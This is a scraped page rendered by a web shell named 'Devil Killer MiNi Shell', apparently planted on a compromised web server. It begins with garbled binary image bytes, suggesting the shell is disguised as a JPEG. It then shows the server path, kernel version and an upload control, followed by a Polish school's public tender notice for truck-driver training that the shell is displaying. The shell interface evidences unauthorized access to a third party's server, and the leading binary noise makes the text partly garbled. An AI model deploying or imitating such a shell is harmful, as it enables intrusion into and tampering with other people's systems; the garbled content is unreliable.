JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250709/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250709/0031766301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> ZSS.DRIVER-C.1.2025 Wykonanie usługi szkoleniowej – dla uczestników Projektu „Driver C” (uczniów oraz nauczycieli) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkół Samochodowych w Łodzi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 473057321</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wojciecha Kilara 3/5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">91-335</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kontakt@zss.elodz.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.zss-lodz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ZSS.DRIVER-C.1.2025 Wykonanie usługi szkoleniowej – dla uczestników Projektu „Driver C” (uczniów oraz nauczycieli) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-75f46eb6-0c09-4530-8f29-5aba6a91d7dd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00317663</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00101469/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Wykonanie usługi szkoleniowej – dla uczestników Projektu „Driver C” (uczniów oraz nauczycieli)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt nr FELD.08.08-IZ.00-0010/24 „Driver C” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-75f46eb6-0c09-4530-8f29-5aba6a91d7dd <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Zgodnie z art. 61 ust. 1 oraz art. 63 ust. 2 Upzp, komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, przy użyciu Platformy e-Zamówienia, która jest dostępna<br/>pod adresem https://ezamowienia.gov.pl (jedyny dopuszczalny sposób złożenia oferty), ePUAPu https://epuap.gov.pl/wps/portal (z wyłączeniem składania oferty) oraz poczty elektronicznej (z wyłączeniem składania oferty): kontakt@zss.elodz.edu.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w niniejszym postępowaniu musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 14 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (dalej zwane „RODO”) uprzejmie informuję, iż:<br/>1. Administratorem Pani/Pana danych osobowych jest Zarząd Województwa Łódzkiego z siedzibą w Łodzi 90-051, al. Piłsudskiego 8, tel.: 42 663 30 00, e-mail: info@lodzkie.pl <br/>2. Administrator powołał Inspektora Ochrony Danych, z którym można się skontaktować w sprawie przetwarzania danych osobowych pisząc na adres e-mail: iod@lodzkie.pl lub na adres siedziby administratora.<br/>3. Pani/Pana dane osobowe przetwarzane będą w celu:<br/>rozliczenia projektu, w szczególności potwierdzenia kwalifikowalności wydatków, monitoringu, kontroli, audytu i sprawozdawczości w ramach programu regionalnego Fundusze Europejskie dla Łódzkiego 2021-2027, a także w celach archiwizacyjnych.<br/>4.	Podstawą przetwarzania Pani/Pana danych osobowych jest:<br/>- art. 6 ust. 1 lit. c i e RODO w związku z:<br/>•	Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2021/1060 z dnia 24 czerwca 2021 r. ustanawiającym wspólne przepisy dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego Plus, Funduszu Spójności, Funduszu na rzecz Sprawiedliwej Transformacji i Europejskiego Funduszu Morskiego, Rybackiego i Akwakultury, a także przepisy finansowe na potrzeby tych funduszy oraz na potrzeby Funduszu Azylu, Migracji i Integracji, Funduszu Bezpieczeństwa Wewnętrznego i Instrumentu Wsparcia Finansowego na rzecz Zarządzania Granicami i Polityki Wizowej;<br/>•	Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2021/1057 z dnia 24 czerwca 2021 r. ustanawiającym Europejski Fundusz Społeczny Plus (EFS+) oraz uchylające rozporządzenie (UE) nr 1296/2013;<br/>•	ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>•	ustawą z dnia 28 kwietnia 2022 r. o zasadach realizacji zadań finansowanych ze środków europejskich w perspektywie finansowej 2021-2027; <br/>•	ustawą z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach.<br/>5.	Przetwarzane dane to:<br/>Imię i nazwisko/nazwa instytucji, NIP, REGON, data zawarcia umowy, kwota na którą zawarto umowę.<br/>6.	Źródłem Pani/Pana danych jest: Beneficjent Miasto Łódź / Zespół Szkół Samochodowych w Łodzi<br/>7.	Odbiorcami/kategoriami odbiorców Pani/Pana danych osobowych będą:<br/>- Minister właściwy ds. rozwoju regionalnego<br/>- podmioty, które na zlecenie Beneficjenta uczestniczą w realizacji Projektu;<br/>- użytkownicy stron internetowych dotyczących zamówień publicznych.<br/>8.	Dane będą przechowywane przez okres 5 lat od dnia 31 grudnia roku, w którym Instytucja Zarządzająca dokonała ostatniej płatności na rzecz Beneficjenta. Okres, o którym mowa w zdaniu pierwszym, zostaje wstrzymany w przypadku wszczęcia postępowania prawnego albo na wniosek Komisji Europejskiej. Dokumenty dotyczące pomocy publicznej udzielanej przedsiębiorcom Beneficjent zobowiązuje się przechowywać przez 10 lat, licząc od dnia jej przyznania, o ile Projekt dotyczy pomocy publicznej.<br/>9.	Posiada Pani/Pan prawo do:<br/>•	dostępu do swoich danych oraz otrzymania ich kopii;<br/>•	sprostowania (poprawiania) swoich danych, jeśli są błędne lub nieaktualne;<br/>•	usunięcia lub ograniczenia przetwarzania danych osobowych w przypadku wystąpienia przesłanek określonych w art. 17 i 18 RODO;<br/>•	wniesienia sprzeciwu wobec przetwarzania danych w przypadku wystąpienia przesłanek, o których mowa w art. 21 RODO; <br/>•	wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych Adres: Urząd Ochrony Danych Osobowych ul. Stawki 2 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSS.DRIVER-C.1.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest kompleksowe wykonanie usługi edukacyjnej szkoleniowej dla Uczestników (uczniów i nauczycieli) w ramach Projektu współfinansowanego ze środków pochodzących z Unii Europejskiej <br/>pn. „Driver C”.<br/>2.	Realizacja usługi obejmuje przeprowadzenie szkoleń dla uczniów i nauczycieli Zespołu Szkół Samochodowych w Łodzi w następującym zakresie:<br/>1)	wsparcie uczniów w zakresie zdobywania uprawnień z zakresu kwalifikacji wstępnej;<br/>2)	wsparcie uczniów w zakresie zdobywania uprawnień Prawo Jazdy kat. C, zwiększających ich szanse na rynku pracy.<br/>3)	wsparcie nauczycieli w zakresie zdobywania uprawnień z zakresu kwalifikacji wstępnej;<br/>4)	wsparcie nauczycieli w zakresie zdobywania uprawnień na Prawo Jazdy kat. C i C+E.<br/>3.	Opis przedmiotu zamówienia i szczególne warunki realizacji usług.<br/>3.1.	ZADANIE 1) WSPARCIE UCZNIÓW W ZAKRESIE ZDOBYWANIA UPRAWNIEŃ Z ZAKRESU KWALIFIKACJI WSTĘPNEJ – ZAKRES TEMATYCZNY ORAZ SPOSÓB PROWADZENIA ZAJĘĆ.<br/>3.1.1.	Przedmiotem zamówienia jest wykonanie usługi polegającej na przygotowaniu Uczestników do dwustopniowej procedury uzyskania prawa jazdy, polegającej na wykonaniu wymaganej przepisami prawa kwalifikacji wstępnej. <br/>3.1.1.1.	Zamawiający przewiduje utworzenie 2 grup po około 10 osób w każdej z nich w każdej z 3 Edycji<br/>3.1.1.2. Zaangażowanie (nakłady) godzinowe – zgodnie ze szczegółowym opisem zawartym w SWZ (patrz tabela Dział III pkt. 4.1.5).<br/>3.2.	ZADANIE 2) WSPARCIE UCZNIÓW W ZAKRESIE ZDOBYWANIA UPRAWNIEŃ PRAWO JAZDY KAT. C, ZWIĘKSZAJĄCYCH ICH SZANSE NA RYNKU PRACY – ZAKRES TEMATYCZNY ORAZ SPOSÓB PROWADZENIA ZAJĘĆ.<br/>3.2.1.	Przedmiotem zamówienia jest wykonanie usługi polegającej na przeprowadzeniu kursu przygotowującego Uczestników do procedury uzyskania prawa jazdy w kat. C.<br/>3.2.1.1.	Zamawiający wymaga przeprowadzenia przez Wykonawcę, po zakończeniu części teoretycznej i praktycznej, egzaminu wewnętrznego mającego potwierdzić nabyte umiejętności. <br/>3.2.1.2.	Zamawiający przewiduje utworzenie 2 grup po około 10 osób w każdej z nich w każdej z 3 Edycji, z zastrzeżeniem pkt. 4.1.6. <br/>3.2.1.3. Zaangażowanie (nakłady) godzinowe – zgodnie ze szczegółowym opisem zawartym w SWZ (patrz tabela Dział III pkt. 4.1.5).<br/>3.3.	ZADANIE 3) KWALIFIKACJA WSTĘPNA PRZYSPIESZONA – ZAKRES TEMATYCZNY ORAZ SPOSÓB PROWADZENIA ZAJĘĆ.<br/>3.3.1.	Przedmiotem zamówienia jest wykonanie usługi polegającej na przygotowaniu Uczestników – nauczycieli do dwustopniowej procedury uzyskania prawa jazdy, polegającej na wykonaniu wymaganej przepisami prawa przyśpieszonej kwalifikacji wstępnej.<br/>3.3.1.1.	Zamawiający przewiduje utworzenie 1 grupy dla 3 osób,<br/>3.3.1.2. Zaangażowanie (nakłady) godzinowe – zgodnie ze szczegółowym opisem zawartym w SWZ (patrz tabela Dział III pkt. 4.1.5).<br/>3.4.	ZADANIE 4) KURS ŁĄCZONY PRAWA JAZDY KAT. C I C+E – ZAKRES TEMATYCZNY ORAZ SPOSÓB PROWADZENIA ZAJĘĆ.<br/>3.4.1.	Przedmiotem zamówienia jest wykonanie usługi polegającej na przeprowadzeniu kursu przygotowującego Uczestników do procedury uzyskania prawa jazdy w kat. C i C+E.<br/>3.4.1.1.	Zamawiający przewiduje utworzenie 1 grupy dla 3 osób,<br/>3.4.1.2. Zaangażowanie (nakłady) godzinowe – zgodnie ze szczegółowym opisem zawartym w SWZ (patrz tabela Dział III pkt. 4.1.5). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2027-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający za najkorzystniejszą uzna ofertę, która spełnia postawione<br/>warunki, nie została odrzucona, nie została złożona przez Wykonawcę podlegającego wykluczeniu oraz która uzyska największą ilość punktów w oparciu o ustalone kryteria oceny ofert. Zamawiający wyznaczył kryteria oceny ofert przypisując im odpowiednie wagi punktowe i przyjął, że w zakresie każdego kryterium wyboru oferty najkorzystniejszej 1% wagi kryterium = 1 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Posiadanie Akredytacji Kuratora Oświaty i/lub certyfikatu jakości usług ISO 9001</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zapewnienie dodatkowych instruktorów nauki jazdy oraz pojazdów na potrzeby kursów szkoleniowych na prawo jazdy kat. C</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ubezpieczenia NNW dla uczestników szkolenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.1	Zamawiający nie opisuje szczegółowo warunków udziału w postępowaniu oraz sposobu oceny spełniania warunków dotyczących:<br/>a)	posiadania zdolności do występowania w obrocie gospodarczym,<br/>b)	sytuacji ekonomicznej lub finansowej,<br/>1.2	Na potrzeby udziału w przedmiotowym postępowaniu, za wystarczające w odniesieniu do warunków o których mowa powyżej w lit. a)-b) , Zamawiający uzna złożenie przez Wykonawcę własnego oświadczenia o treści potwierdzającej, iż posiada zdolność do występowania w obrocie gospodarczym oraz że znajduje się w sytuacji ekonomicznej i finansowej w stopniu niezbędnym do prawidłowego wykonywania i ukończenia realizacji usługi zgodnie z wymogami Zamawiającego i niniejszej SWZ. <br/>2.	Zamawiający opisuje szczegółowo warunki udziału w postępowaniu oraz sposobu oceny spełniania warunków dotyczących:<br/>a)	zdolności technicznej i zawodowej,<br/>b)	spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej i zawodowej oraz posiadania uprawnień do wykonywania określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów,<br/>2.1. Warunek udziału w postępowaniu o którym mowa w pkt. 2 lit. a) zostanie spełniony, jeżeli Wykonawca wykaże że:<br/>a) dysponuje odpowiednim zapleczem technicznym co oznacza, że Wykonawca zobowiązany jest wykazać że dysponuje lub będzie dysponował – przez cały okres realizacji zamówienia (danego zadania), odpowiednio przygotowanymi pojazdami do prowadzenia przedmiotowych szkoleń w danej kategorii w ilości nie mniejszej niż:<br/>	- 5 (pięć) pojazdów przystosowanych do nauki jazdy w kategorii C, <br/>	- 1 (jeden) zespół pojazdów (z przyczepą/naczepą) przystosowany do nauki jazdy w kategorii C+E,<br/>UWAGA: Ww. pojazdy muszą spełniać warunki określone w Rozporządzeniu Ministra Infrastruktury z dnia 25 marca 2022 r. w sprawie szkolenia i egzaminowania kierowców wykonujących przewóz drogowy (Dz.U. z 2022r. poz. 739 ze zm.) oraz w Rozporządzeniu Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (tj. Dz.U. z 2024r. poz. 502 ze zm.).<br/>b) dysponuje odpowiednim zapleczem technicznym co oznacza, że Wykonawca zobowiązany jest wykazać że dysponuje lub będzie dysponował – przez cały okres realizacji zamówienia (danego zadania), odpowiednio wykwalifikowaną kadrą szkoleniową tj.:<br/>- co najmniej 2 osobami zdolnymi (instruktorami nauki jazdy) do prowadzenia kursu w części teoretycznej (wykładowca/instruktor), z których każda <br/>w okresie ostatnich trzech lat przed upływem terminu składnia ofert przeprowadziła min. 120 godzin kursów lub szkoleń lub wykładów związanych z przedmiotem zamówienia (teoretyczny kurs prawa jazdy kat. C lub C+E),<br/>- co najmniej 5 osobami zdolnymi (instruktorami nauki jazdy) do prowadzenia kursu w części praktycznej, z których każda posiada kwalifikacje zawodowe <br/>i uprawnienia zgodne z ustawą z dnia 5 stycznia 2011 r. o kierujących pojazdami (Dz. U. z 2024 r. poz. 1210), a także wydanymi do niej aktami wykonawczymi oraz z których każda przeprowadziła, w okresie ostatnich trzech lat przed upływem terminu składnia ofert, min. 120 godzin kursów związanych z przedmiotem zamówienia (praktyczny kurs prawa jazdy kat. C lub C+E),<br/>UWAGA: Zamawiający uzna za odpowiadające spełnieniu ww. warunku udziału, jeżeli Wykonawca wykaże dysponowanie jedynie 5 osobami, pod warunkiem, że dwie osoby o których mowa powyżej (odpowiedzialne za teoretyczną część szkolenia) będą również uczestniczyły w realizacji praktycznej części szkolenia pod rygorem wykazania, że posiadają one określone kwalifikacje i doświadczenie przypisane dla osób odpowiedzialnych za praktyczną część szkolenia. <br/>UWAGA: Zamawiający informuje, że przewiduje się wystąpienie sytuacji (na etapie realizacji przyszłego świadczenia umownego) w której w jednym czasie zostaną wyznaczone terminy realizacji usługi (w szczególności dot. do zajęć praktycznej nauki jazdy) – dla możliwie jak największej liczby uczestników. Wykonawca, a w szczególności Wykonawca ubiegający się o przyznanie punktów dodatkowych w pozacenowym kryterium oceny ofert o którym mowa w SWZ poz. Dział XXII pkt. 1 ppkt. 1.3, składając ofertę oświadcza, że akceptuje powyższe zastrzeżenie dotyczące sposobu realizacji zamówienia. <br/>c) dysponuje odpowiednim zapleczem technicznym co oznacza, że Wykonawca zobowiązany jest wykazać że dysponuje lub będzie dysponował – przez cały okres realizacji zamówienia (danego zadania), odpowiednio przygotowaną salą szkoleniową wyposażoną w niezbędne narzędzia dydaktyczne do praktycznej nauki jazdy w tym w szczególności w symulator nauki jazdy w warunkach specjalnych dla kategorii C oraz C+E, z tym zastrzeżeniem, że pracownia ta musi znajdować się w granicach administracyjnych miasta Łodzi,<br/>2.2. Warunek udziału w postępowaniu o którym mowa w pkt. 2 lit. b) zostanie spełniony, jeżeli Wykonawca wykaże że:<br/>a) Wykonawca posiada wpis do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">A. DOKUMENTY SKŁADANE 